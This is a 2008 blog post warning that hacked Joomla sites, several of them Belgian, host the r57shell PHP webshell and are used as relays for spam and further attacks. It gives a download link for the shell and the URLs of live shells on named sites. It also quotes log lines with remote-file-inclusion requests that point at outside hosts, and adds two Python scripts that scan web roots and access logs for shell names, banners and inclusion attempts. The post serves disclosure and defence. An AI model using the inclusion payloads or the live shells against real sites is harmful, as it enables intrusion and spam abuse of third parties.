08/19/2008
Joomla hack used to install cyberwar or superspam scripts on sites?
It is a Russian script that is used to attack other sites:
o---[ r57shell - http-shell by RST/GHC | http://rst.void.ru | http://ghc.ru | version 1.31 ]---o
It can also be found here: http://www.filekeeper.org/download/shared/r57shell.php (79.5 Kb)
This is what it looks like (you can click on it for a bigger image).
OK, at the moment this script is on the following Belgian sites:
------------------------------------------------------------
1. http://www.breast-reduction.be/~willboar/r57.php?tmp
In this case the listing also shows what was added to the site (including illegal content):
total 14256
01-Soundtrack_NFS_Most_Wanted.mp3
15996173 -rw-r--r-- 1 willboar willboar 203 Jun 24 02:29 buy-viagra-cheap-drug.html
15996646 -rw-r--r-- 1 willboar willboar 15 Jun 29 13:50 buzul.html
15995453 -rw-r--r-- 1 willboar willboar 152958 Jun 18 11:44 c00.php
15996137 -rw-r--r-- 1 willboar willboar 161828 Jun 9 23:27 c100.php
16007195 drwxr-xr-x 2 willboar willboar 4096 May 28 05:58 casino-1
15995607 -rw-r--r-- 1 willboar willboar 4134512 Jun 17 17:19 Era-amen0.mp3
15991423 drwxr-xr-x 3 willboar willboar 4096 May 26 14:15 galeri
15992936 -rw-r--r-- 1 willboar willboar 4152958 Jun 11 20:57 hbtsoundtrack.mp3
15992852 -rw-r--r-- 1 willboar willboar 0 Jun 21 11:19 .htaccess
15992556 drwxr-xr-x 3 willboar willboar 12288 Jun 12 15:38 konsept arabalar,
15992557 drwxr-xr-x 2 willboar willboar 4096 Jun 21 07:49 modifiye
15995615 -rw-r--r-- 1 willboar willboar 28273 Jun 17 17:19 necati_sasmaz.JPG
16007197 drwxr-xr-x 2 willboar willboar 4096 May 28 05:58 playonsports
16007192 drwxr-xr-x 3 willboar willboar 4096 Jul 31 11:15 protoolshack
15996130 -rw-r--r-- 1 willboar willboar 103888 Jun 11 12:11 r57.php
16007170 drwxr-xr-x 2 willboar willboar 28672 Jun 19 11:47 spy
16007193 drwxr-xr-x 2 willboar willboar 4096 May 28 05:58 tramadol4less
15992558 drwxr-xr-x 3 willboar willboar 4096 May 27 19:50 video
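The listing above is exactly what an administrator should be looking for on their own web root: files named after known shells (r57.php, c00.php, c100.php), files whose contents carry the r57shell banner even when renamed, and spam directories such as casino-1 or tramadol4less. The script below is an added example for doing that scan and is not code from the original post or from the shell's authors. The indicator lists are drawn from the banner and the listing shown here and are an assumption of this example, not a complete webshell signature set; the web root it scans is constructed in a temporary directory so the example runs offline.

```python
import tempfile
from pathlib import Path

# Indicators drawn from the listing and banner in the post (assumption of this
# example; deliberately short, not a full signature set).
SHELL_NAMES = {"r57.php", "r57shell.php", "c00.php", "c100.php"}
SHELL_SIGNATURES = (b"r57shell", b"http-shell by RST/GHC")
SPAM_KEYWORDS = ("viagra", "casino", "tramadol")
MAX_READ = 512 * 1024  # only inspect the first 512 KiB of each file


def scan_webroot(root):
    """Walk a web root and return the entries that match an indicator.

    Each finding is a dict with the path relative to ``root`` and the list of
    reasons it was flagged: known shell file name, shell banner in the file
    contents, or a spam keyword in the file or directory name.
    """
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        name = path.name.lower()
        reasons = []
        if name in SHELL_NAMES:
            reasons.append(f"file name {path.name} is a known webshell name")
        if any(word in name for word in SPAM_KEYWORDS):
            reasons.append(f"name {path.name} contains a spam keyword")
        if path.is_file():
            try:
                with path.open("rb") as fh:
                    head = fh.read(MAX_READ)
            except OSError:
                head = b""
            for signature in SHELL_SIGNATURES:
                if signature in head:
                    reasons.append(f"contents contain shell banner {signature.decode()!r}")
                    break
        if reasons:
            findings.append({"path": path.relative_to(root).as_posix(), "reasons": reasons})
    return findings


def build_sample_webroot():
    """Create a constructed web root in a temp directory for demonstration."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "index.php").write_text("<?php echo 'site'; ?>\n")
    (root / "galeri").mkdir()
    (root / "galeri" / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0JFIF")
    # A shell dropped under a harmless-looking name: caught by its banner.
    (root / "tmp").mkdir()
    (root / "tmp" / "shell.php").write_text(
        "<?php\n// o---[ r57shell - http-shell by RST/GHC ]---o\n?>\n"
    )
    # A known shell file name with the banner stripped: caught by its name.
    (root / "c100.php").write_text("<?php /* stripped */ ?>\n")
    # A spam directory like the casino-1 / tramadol4less entries in the listing.
    (root / "casino-1").mkdir()
    return root


if __name__ == "__main__":
    for finding in scan_webroot(build_sample_webroot()):
        print(finding["path"], "->", "; ".join(finding["reasons"]))
```

Run it against a real document root by replacing `build_sample_webroot()` with the path to scan; a content match is the more reliable signal, since the file name is whatever the attacker chose.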
------------------------------------------------------------
Another Belgian one (a travel operator I think, probably on holiday :)
2. http://www.vip-apt.be/templates/gingervip/index.php (an example that the templates of Joomla are an open door - anything goes...)
------------------------------------------------------------
As this log from a fully spammed site (a bulletin board) shows, these scripts on other sites are being used to attack further sites, for example this guestbook, which now carries links to spam and illegal material that they had earlier placed on other sites and in interactive functions like forums and guestbooks:
5:50pm/start.php?page=http:/209.250.239.6/images/tmp/hack8/phpshells/Dx.txt ...... /camarchive.php?page=www.randomix.h18.ru/phpBB2/docs/r57.php ...
www.somatik.be/stats_report.php
If you don't believe me, do a Google dork: site:somatik.be sex
------------------------------------------------------------
So the sites hosting this script will be used to spam, will be treated as spammers and will be blocked like spammers,
as happened with this Belgian site, which is blacklisted, well, by my blacklister:
5:26pm1, 2, 22.22%, o---[ r57shell - http-shell by rst/ghc | http://rst.void.ru. 2, 1, 11.11%, ---[ r57shell - http-shell by rst/ghc ...
3. www.topfood.be/webstat/usage_200808.html
------------------------------------------------------------
This is another live one, although not from Belgium. It is not easy finding them with Google; you'll have to find the r57 links in your logs to be sure. We don't have a CERT, so who is going to get them taken down? The administrators? Make me :)
http://aquafitness.gr/~willboar/r57.php
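Finding the r57 links in your logs, as the post recommends, and spotting the remote-inclusion requests shown in the guestbook log above, is easy to automate. The script below is an added example that is not part of the original post: it parses Apache combined-format access log lines and flags three things: a request for a known shell file name, a query parameter whose value is a URL or a host name with a path (the `page=http://...` shape in the log above), and the r57shell banner text in the referer or user-agent header. The log lines are constructed for the example with RFC 5737 documentation addresses; the shell-name list and the choice of headers to check for the banner are assumptions of this example, not something the post states.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format: ip ident user [time] "method target proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Indicators taken from the post: shell file names seen in the listing and the
# banner the shell prints. Assumption of this example, not a complete set.
SHELL_NAMES = {"r57.php", "r57shell.php", "c00.php", "c100.php", "dx.txt"}
SHELL_BANNER = "r57shell"
# A parameter value that is a URL, or a host name followed by a path, has the
# shape of a remote file inclusion attempt (page=http://... in the log above).
REMOTE_VALUE = re.compile(r"^(?:https?://|ftp://|[\w.-]+\.[a-z]{2,}/)", re.I)

# Constructed sample log lines (not from the post's logs); IPs are RFC 5737 addresses.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Aug/2008:17:50:02 +0200] "GET /start.php?page=http://198.51.100.7/images/tmp/hack8/phpshells/Dx.txt HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
203.0.113.5 - - [19/Aug/2008:17:50:09 +0200] "GET /camarchive.php?page=www.example.net/phpBB2/docs/r57.php HTTP/1.1" 200 811 "-" "Mozilla/4.0"
198.51.100.23 - - [19/Aug/2008:17:51:30 +0200] "GET /~willboar/r57.php?tmp HTTP/1.1" 200 104211 "-" "Mozilla/5.0"
192.0.2.44 - - [19/Aug/2008:17:52:00 +0200] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 2331 "http://www.example.be/" "Mozilla/5.0"
192.0.2.44 - - [19/Aug/2008:17:52:10 +0200] "GET /templates/gingervip/index.php HTTP/1.1" 200 100 "-" "o---[ r57shell - http-shell by RST/GHC"
"""


def inspect_line(line):
    """Return a finding dict for one access log line, or None if the line is
    clean or does not parse as combined log format."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    d = m.groupdict()
    parts = urlsplit(d["target"])
    reasons = []
    # 1. Direct request for a file with a known shell name.
    if parts.path.rsplit("/", 1)[-1].lower() in SHELL_NAMES:
        reasons.append(f"request for known webshell file {parts.path}")
    # 2. Query parameter pointing at a remote file (inclusion attempt).
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(value)
        if REMOTE_VALUE.match(value):
            reasons.append(f"remote file inclusion attempt: {key}={value}")
    # 3. The shell's banner text showing up in a request header.
    for header in ("referer", "agent"):
        if SHELL_BANNER in d[header].lower():
            reasons.append(f"shell banner in {header} header")
    if not reasons:
        return None
    return {"ip": d["ip"], "time": d["time"], "target": d["target"], "reasons": reasons}


def scan_log(text):
    """Run inspect_line over every line of a log and collect the findings."""
    return [f for f in (inspect_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["target"], "->", "; ".join(finding["reasons"]))
```

To use it on a live server, feed the contents of the access log to `scan_log` instead of `SAMPLE_LOG`; the second indicator is the one worth alerting on regardless of shell name, because it shows the application accepting a remote path in a parameter, which is the hole the shell arrived through.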
Looking at the scripts, you can of course use these sites to attack any other site in any other way you may choose. So this could be a platform for cyberattacks.
Anyone remember that there is a cyberwar going up and down, on and a bit off, and who knows restarting at some point?
Where is the Belgian CERT ?
YOU ONLY HAVE YOURSELF AND EACH OTHER. NOBODY IS GOING TO HELP YOU. SO YOU HAVE TO PROTECT AND MONITOR AND PATCH YOUR MACHINES AND SITES YOURSELF. NOBODY IS THERE TO DEFEND YOU.
We try to help you only a little bit :) but that is nothing compared with what should be done.
18:06